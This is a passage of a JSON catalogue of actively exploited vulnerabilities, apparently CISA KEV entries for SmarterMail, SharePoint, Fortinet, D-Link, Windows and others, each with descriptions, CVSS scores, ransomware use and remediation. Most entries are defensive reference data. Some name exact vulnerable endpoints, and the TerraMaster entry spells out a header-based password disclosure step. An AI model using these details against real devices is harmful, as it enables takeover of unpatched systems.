serves the malicious OS command and could lead to command execution. ", "nvd_description": "SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method. The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS command. This command will be executed by the vulnerable application.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-306"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2025-49704", "name": "Microsoft SharePoint Code Injection Vulnerability", "vendor": "Microsoft", "product": "SharePoint", "kev_description": "Microsoft SharePoint contains a code injection vulnerability that could allow an authorized attacker to execute code over a network. This vulnerability could be chained with CVE-2025-49706. CVE-2025-53770 is a patch bypass for CVE-2025-49704, and the updates for CVE-2025-53770 include more robust protection than those for CVE-2025-49704.", "nvd_description": "Improper control of generation of code ('code injection') in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-94"], "ransomware_use": "Known", "required_action": "Disconnect public-facing versions of SharePoint Server that have reached their end-of-life (EOL) or end-of-service (EOS) to include SharePoint Server 2013 and earlier versions. For supported versions, please follow the mitigations according to CISA (URL listed below in Notes) and vendor instructions (URL listed below in Notes). Adhere to the applicable BOD 22-01 guidance for cloud services or discontinue use of the product if mitigations are not available."}, {"cve_id": "CVE-2024-57727", "name": "SimpleHelp Path Traversal Vulnerability", "vendor": "SimpleHelp ", "product": "SimpleHelp", "kev_description": "SimpleHelp remote support software contains multiple path traversal vulnerabilities that allow unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files may include server configuration files and hashed user passwords.", "nvd_description": "SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords.", "cvss": "7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "cwes": ["CWE-22"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2023-24955", "name": "Microsoft SharePoint Server Code Injection Vulnerability", "vendor": "Microsoft", "product": "SharePoint Server", "kev_description": "Microsoft SharePoint Server contains a code injection vulnerability that allows an authenticated attacker with Site Owner privileges to execute code remotely.", "nvd_description": "Microsoft SharePoint Server Remote Code Execution Vulnerability", "cvss": "7.2 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-94"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2022-24990", "name": "TerraMaster OS Remote Command Execution Vulnerability", "vendor": "TerraMaster", "product": "TerraMaster OS", "kev_description": "TerraMaster OS contains a remote command execution vulnerability that allows an unauthenticated user to execute commands on the target endpoint.", "nvd_description": "TerraMaster NAS 4.2.29 and earlier allows remote attackers to discover the administrative password by sending \"User-Agent: TNAS\" to module/api.php?mobile/webNasIPS and then reading the PWD field in the response.", "cvss": "7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "cwes": ["CWE-306"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2021-27878", "name": "Veritas Backup Exec Agent Command Execution Vulnerability", "vendor": "Veritas", "product": "Backup Exec Agent", "kev_description": "Veritas Backup Exec (BE) Agent contains a command execution vulnerability that could allow an attacker to use a data management protocol command to execute a command on the BE Agent machine.", "nvd_description": "An issue was discovered in Veritas Backup Exec before 21.2. The communication between a client and an Agent requires successful authentication, which is typically completed over a secure TLS communication. However, due to a vulnerability in the SHA Authentication scheme, an attacker is able to gain unauthorized access and complete the authentication process. Subsequently, the client can execute data management protocol commands on the authenticated connection. The attacker could use one of these commands to execute an arbitrary command on the system using system privileges.", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2020-0787", "name": "Microsoft Windows Background Intelligent Transfer Service (BITS) Improper Privilege Management Vulnerability", "vendor": "Microsoft", "product": "Windows", "kev_description": "Microsoft Windows BITS is vulnerable to to a privilege elevation vulnerability if it improperly handles symbolic links. An actor can exploit this vulnerability to execute arbitrary code with system-level privileges.", "nvd_description": "An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links, aka 'Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability'.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-59"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2019-7192", "name": "QNAP Photo Station Improper Access Control Vulnerability", "vendor": "QNAP", "product": "Photo Station", "kev_description": "QNAP NAS devices running Photo Station contain an improper access control vulnerability allowing remote attackers to gain unauthorized access to the system.", "nvd_description": "This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-863"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2018-6530", "name": "D-Link Multiple Routers OS Command Injection Vulnerability", "vendor": "D-Link", "product": "Multiple Routers", "kev_description": "Multiple D-Link routers contain an unspecified vulnerability that allows for execution of OS commands.", "nvd_description": "OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-78"], "ransomware_use": "Known", "required_action": "The vendor D-Link published an advisory stating the fix under CVE-2018-20114 properly patches KEV entry CVE-2018-6530. If the device is still supported, apply updates per vendor instructions. If the affected device has since entered its end-of-life, it should be disconnected if still in use."}, {"cve_id": "CVE-2017-18362", "name": "Kaseya VSA SQL Injection Vulnerability", "vendor": "Kaseya", "product": "Virtual System/Server Administrator (VSA)", "kev_description": "ConnectWise ManagedITSync integration for Kaseya VSA is vulnerable to unauthenticated remote commands that allow full direct access to the Kaseya VSA database.", "nvd_description": "ConnectWise ManagedITSync integration through 2017 for Kaseya VSA is vulnerable to unauthenticated remote commands that allow full direct access to the Kaseya VSA database. In February 2019, attackers have actively exploited this in the wild to download and execute ransomware payloads on all endpoints managed by the VSA server. If the ManagedIT.asmx page is available via the Kaseya VSA web interface, anyone with access to the page is able to run arbitrary SQL queries, both read and write, without authentication.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-89"], "ransomware_use": "Known", "required_action": "The impacted product is end-of-life and should be disconnected if still in use."}, {"cve_id": "CVE-2016-0099", "name": "Microsoft Windows Secondary Logon Service Privilege Escalation Vulnerability", "vendor": "Microsoft", "product": "Windows", "kev_description": "A privilege escalation vulnerability exists in Microsoft Windows if the Windows Secondary Logon Service fails to properly manage request handles in memory. An attacker who successfully exploited this vulnerability could run arbitrary code as an administrator.", "nvd_description": "The Secondary Logon Service in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 does not properly process request handles, which allows local users to gain privileges via a crafted application, aka \"Secondary Logon Elevation of Privilege Vulnerability.\"", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-120"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2015-5317", "name": "Jenkins User Interface (UI) Information Disclosure Vulnerability", "vendor": "Jenkins", "product": "Jenkins User Interface (UI)", "kev_description": "Jenkins User Interface (UI) contains an information disclosure vulnerability that allows users to see the names of jobs and builds otherwise inaccessible to them on the \"Fingerprints\" pages.", "nvd_description": "The Fingerprints pages in Jenkins before 1.638 and LTS before 1.625.2 might allow remote attackers to obtain sensitive job and build name information via a direct request.", "cvss": "7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "cwes": ["CWE-200"], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2014-0497", "name": "Adobe Flash Player Integer Underflow Vulnerablity", "vendor": "Adobe", "product": "Flash Player", "kev_description": "Adobe Flash Player contains an integer underflow vulnerability that allows a remote attacker to execute arbitrary code.", "nvd_description": "Integer underflow in Adobe Flash Player before 11.7.700.261 and 11.8.x through 12.0.x before 12.0.0.44 on Windows and Mac OS X, and before 11.2.202.336 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-191"], "ransomware_use": "Unknown", "required_action": "The impacted product is end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue utilization of the product."}, {"cve_id": "CVE-2013-2465", "name": "Oracle Java SE Unspecified Vulnerability", "vendor": "Oracle", "product": "Java SE", "kev_description": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE allows remote attackers to affect confidentiality, integrity, and availability via Unknown vectors related to 2D", "nvd_description": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D. NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to bypass the Java sandbox via vectors related to \"Incorrect image channel verification\" in 2D.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-693"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2012-4792", "name": "Microsoft Internet Explorer Use-After-Free Vulnerability", "vendor": "Microsoft", "product": "Internet Explorer", "kev_description": "Microsoft Internet Explorer contains a use-after-free vulnerability that allows a remote attacker to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object.", "nvd_description": "Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object, and exploited in the wild in December 2012.", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-416"], "ransomware_use": "Unknown", "required_action": "The impacted product is end-of-life and should be disconnected if still in use."}, {"cve_id": "CVE-2011-2005", "name": "Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability", "vendor": "Microsoft", "product": "Ancillary Function Driver (afd.sys)", "kev_description": "afd.sys in the Ancillary Function Driver in Microsoft Windows does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application.", "nvd_description": "afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka \"Ancillary Function Driver Elevation of Privilege Vulnerability.\"", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2010-0806", "name": "Microsoft Internet Explorer Use-After-Free Vulnerability", "vendor": "Microsoft", "product": "Internet Explorer", "kev_description": "Microsoft Internet Explorer contains an use-after-free vulnerability that could allow remote attackers to execute arbitrary code via vectors involving access to an invalid pointer after the deletion of an object. The impacted product could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.", "nvd_description": "Use-after-free vulnerability in the Peer Objects component (aka iepeers.dll) in Microsoft Internet Explorer 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via vectors involving access to an invalid pointer after the deletion of an object, as exploited in the wild in March 2010, aka \"Uninitialized Memory Corruption Vulnerability.\"", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-399", "CWE-416"], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2009-4324", "name": "Adobe Acrobat and Reader Use-After-Free Vulnerability", "vendor": "Adobe", "product": "Acrobat and Reader", "kev_description": "Use-after-free vulnerability in Adobe Acrobat and Reader allows remote attackers to execute code via a crafted PDF file.", "nvd_description": "Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-416"], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2026-23760", "name": "SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability", "vendor": "SmarterTools", "product": "SmarterMail", "kev_description": "SmarterTools SmarterMail contains an authentication bypass using an alternate path or channel vulnerability in the password reset API. The force-reset-password endpoint permits anonymous requests and fails to verify the existing password or a reset token when resetting system administrator accounts. This could allow an unauthenticated attacker to supply a target administrator username and a new password to reset the account, resulting in full administrative compromise of the SmarterMail instance.", "nvd_description": "SmarterTools SmarterMail versions prior to build 9511 contain an authentication bypass vulnerability in the password reset API. The force-reset-password endpoint permits anonymous requests and fails to verify the existing password or a reset token when resetting system administrator accounts. An unauthenticated attacker can supply a target administrator username and a new password to reset the account, resulting in full administrative compromise of the SmarterMail instance. NOTE: SmarterMail system administrator privileges grant the ability to execute operating system commands via built-in management functionality, effectively providing administrative (SYSTEM or root) access on the underlying host.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-288"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2025-49706", "name": "Microsoft SharePoint Improper Authentication Vulnerability", "vendor": "Microsoft", "product": "SharePoint", "kev_description": "Microsoft SharePoint contains an improper authentication vulnerability that allows an authorized attacker to perform spoofing over a network. Successfully exploitation could allow an attacker to view sensitive information and make some changes to disclosed information. This vulnerability could be chained with CVE-2025-49704. CVE-2025-53771 is a patch bypass for CVE-2025-49706, and the updates for CVE-2025-53771 include more robust protection than those for CVE-2025-49706.", "nvd_description": "Improper authentication in Microsoft Office SharePoint allows an unauthorized attacker to perform spoofing over a network.", "cvss": "6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "cwes": ["CWE-287"], "ransomware_use": "Known", "required_action": "Disconnect public-facing versions of SharePoint Server that have reached their end-of-life (EOL) or end-of-service (EOS) to include SharePoint Server 2013 and earlier versions. For supported versions, please follow the mitigations according to CISA (URL listed below in Notes) and vendor instructions (URL listed below in Notes). Adhere to the applicable BOD 22-01 guidance for cloud services or discontinue use of the product if mitigations are not available."}, {"cve_id": "CVE-2024-55591", "name": "Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability", "vendor": "Fortinet", "product": "FortiOS and FortiProxy", "kev_description": "Fortinet FortiOS and FortiProxy contain an authentication bypass vulnerability that may allow an unauthenticated, remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.", "nvd_description": "An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7.0.0 through 7.0.16 and FortiProxy version 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12 allows a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-288"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2023-48788", "name": "Fortinet FortiClient EMS SQL Injection Vulnerability", "vendor": "Fortinet", "product": "FortiClient EMS", "kev_description": "Fortinet FortiClient EMS contains a SQL injection vulnerability that allows an unauthenticated attacker to execute commands as SYSTEM via specifically crafted requests.", "nvd_description": "A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-89"], "ransomware_use": "Known", "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2022-21587", "name": "Oracle E-Business Suite Unspecified Vulnerability", "vendor": "Oracle", "product": "E-Business Suite", "kev_description": "Oracle E-Business Suite contains an unspecified vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator.", "nvd_description": "Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-306"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2021-42287", "name": "Microsoft Active Directory Domain Services Privilege Escalation Vulnerability", "vendor": "Microsoft", "product": "Active Directory", "kev_description": "Microsoft Active Directory Domain Services contains an unspecified vulnerability that allows for privilege escalation.", "nvd_description": "Active Directory Domain Services Elevation of Privilege Vulnerability", "cvss": "7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2020-3580", "name": "Cisco ASA and FTD Cross-Site Scripting (XSS) Vulnerability", "vendor": "Cisco", "product": "Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)", "kev_description": "Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an insufficient input validation vulnerability for user-supplied input by the web services interface. Successful exploitation could allow an attacker to perform cross-site scripting (XSS) in the context of the interface or access sensitive browser-based information.", "nvd_description": "Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.", "cvss": "6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "cwes": ["CWE-79"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2019-1385", "name": "Microsoft Windows AppX Deployment Extensions Privilege Escalation Vulnerability", "vendor": "Microsoft", "product": "Windows", "kev_description": "A privilege escalation vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files.", "nvd_description": "An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files.To exploit this vulnerability, an authenticated attacker would need to run a specially crafted application to elevate privileges.The security update addresses the vulnerability by correcting how AppX Deployment Extensions manages privileges., aka 'Windows AppX Deployment Extensions Elevation of Privilege Vulnerability'.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-59"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2018-13374", "name": "Fortinet FortiOS and FortiADC Improper Access Control Vulnerability", "vendor": "Fortinet", "product": "FortiOS and FortiADC", "kev_description": "Fortinet FortiOS and FortiADC contain an improper access control vulnerability that allows attackers to obtain the LDAP server login credentials configured in FortiGate by pointing a LDAP server connectivity test request to a rogue LDAP server.", "nvd_description": "A Improper Access Control in Fortinet FortiOS 6.0.2, 5.6.7 and before, FortiADC 6.1.0, 6.0.0 to 6.0.1, 5.4.0 to 5.4.4 allows attacker to obtain the LDAP server login credentials configured in FortiGate via pointing a LDAP server connectivity test request to a rogue LDAP server instead of the configured one.", "cvss": "4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "cwes": ["CWE-732"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2017-0148", "name": "Microsoft SMBv1 Server Remote Code Execution Vulnerability", "vendor": "Microsoft", "product": "SMBv1 server", "kev_description": "The SMBv1 server in Microsoft allows remote attackers to execute arbitrary code via crafted packets.", "nvd_description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.", "cvss": "8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-20"], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2016-0167", "name": "Microsoft Win32k Privilege Escalation Vulnerability", "vendor": "Microsoft", "product": "Win32k", "kev_description": "Microsoft Win32k contains an unspecified vulnerability that allows for privilege escalation via a crafted application", "nvd_description": "The kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows local users to gain privileges via a crafted application, aka \"Win32k Elevation of Privilege Vulnerability,\" a different vulnerability than CVE-2016-0143 and CVE-2016-0165.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": [], "ransomware_use": "Known", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2015-0310", "name": "Adobe Flash Player ASLR Bypass Vulnerability", "vendor": "Adobe", "product": "Flash Player", "kev_description": "Adobe Flash Player does not properly restrict discovery of memory addresses, which allows attackers to bypass the address space layout randomization (ASLR) protection mechanism.", "nvd_description": "Adobe Flash Player before 13.0.0.262 and 14.x through 16.x before 16.0.0.287 on Windows and OS X and before 11.2.202.438 on Linux does not properly restrict discovery of memory addresses, which allows attackers to bypass the ASLR protection mechanism on Windows, and have an unspecified impact on other platforms, via unknown vectors, as exploited in the wild in January 2015.", "cvss": "7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-200"], "ransomware_use": "Unknown", "required_action": "The impacted product is end-of-life and should be disconnected if still in use."}, {"cve_id": "CVE-2014-100005", "name": "D-Link DIR-600 Router Cross-Site Request Forgery (CSRF) Vulnerability", "vendor": "D-Link", "product": "DIR-600 Router", "kev_description": "D-Link DIR-600 routers contain a cross-site request forgery (CSRF) vulnerability that allows an attacker to change router configurations by hijacking an existing administrator session.", "nvd_description": "Multiple cross-site request forgery (CSRF) vulnerabilities in D-Link DIR-600 router (rev. Bx) with firmware before 2.17b02 allow remote attackers to hijack the authentication of administrators for requests that (1) create an administrator account or (2) enable remote management via a crafted configuration module to hedwig.cgi, (3) activate new configuration settings via a SETCFG,SAVE,ACTIVATE action to pigwidgeon.cgi, or (4) send a ping via a ping action to diagnostic.php.", "cvss": "8.0 HIGH CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-352"], "ransomware_use": "Unknown", "required_action": "This vulnerability affects legacy D-Link products. All associated hardware revisions have reached their end-of-life (EOL) or end-of-service (EOS) life cycle and should be retired and replaced per vendor instructions."}, {"cve_id": "CVE-2013-3918", "name": "Microsoft Windows Out-of-Bounds Write Vulnerability", "vendor": "Microsoft", "product": "Windows", "kev_description": "Microsoft Windows contains an out-of-bounds write vulnerability in the InformationCardSigninHelper Class ActiveX control, icardie.dll. An attacker could exploit the vulnerability by constructing a specially crafted webpage. When a user views the webpage, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. The impacted product could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.", "nvd_description": "The InformationCardSigninHelper Class ActiveX control in icardie.dll in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds write) via a crafted web page that is accessed by Internet Explorer, as exploited in the wild in November 2013, aka \"InformationCardSigninHelper Vulnerability.\"", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-787"], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2012-5054", "name": "Adobe Flash Player Integer Overflow Vulnerability", "vendor": "Adobe", "product": "Flash Player", "kev_description": "Adobe Flash Player contains an integer overflow vulnerability that allows remote attackers to execute code via malformed arguments.", "nvd_description": "Integer overflow in the copyRawDataTo method in the Matrix3D class in Adobe Flash Player before 11.4.402.265 allows remote attackers to execute arbitrary code via malformed arguments.", "cvss": "8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "cwes": ["CWE-190"], "ransomware_use": "Unknown", "required_action": "The impacted product is end-of-life and should be disconnected if still in use."}, {"cve_id": "CVE-2011-3544", "name": "Oracle Java SE Runtime Environment (JRE) Arbitrary Code Execution Vulnerability", "vendor": "Oracle", "product": "Java SE JDK and JRE", "kev_description": "An access control vulnerability exists in the Applet Rhino Script Engine component of Oracle's Java Runtime Environment allows an attacker to remotely execute arbitrary code.", "nvd_description": "Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Scripting.", "cvss": "9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-284"], "ransomware_use": "Unknown", "required_action": "Apply updates per vendor instructions."}, {"cve_id": "CVE-2010-3962", "name": "Microsoft Internet Explorer Uninitialized Memory Corruption Vulnerability", "vendor": "Microsoft", "product": "Internet Explorer", "kev_description": "Microsoft Internet Explorer contains an uninitialized memory corruption vulnerability that could allow for remote code execution. The impacted product could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.", "nvd_description": "Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Cascading Style Sheets (CSS) token sequences and the clip attribute, aka an \"invalid flag reference\" issue or \"Uninitialized Memory Corruption Vulnerability,\" as exploited in the wild in November 2010.", "cvss": "8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "cwes": ["CWE-416"], "ransomware_use": "Unknown", "required_action": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."}, {"cve_id": "CVE-2009-3953", "name": "Adobe Acrobat and Reader Universal 3D Remote Code Execution Vulnerability", "vendor": "Adobe", "product": "Acrobat and Reader", "kev_description": "Adobe Acrobat and Reader contains an array boundary issue in 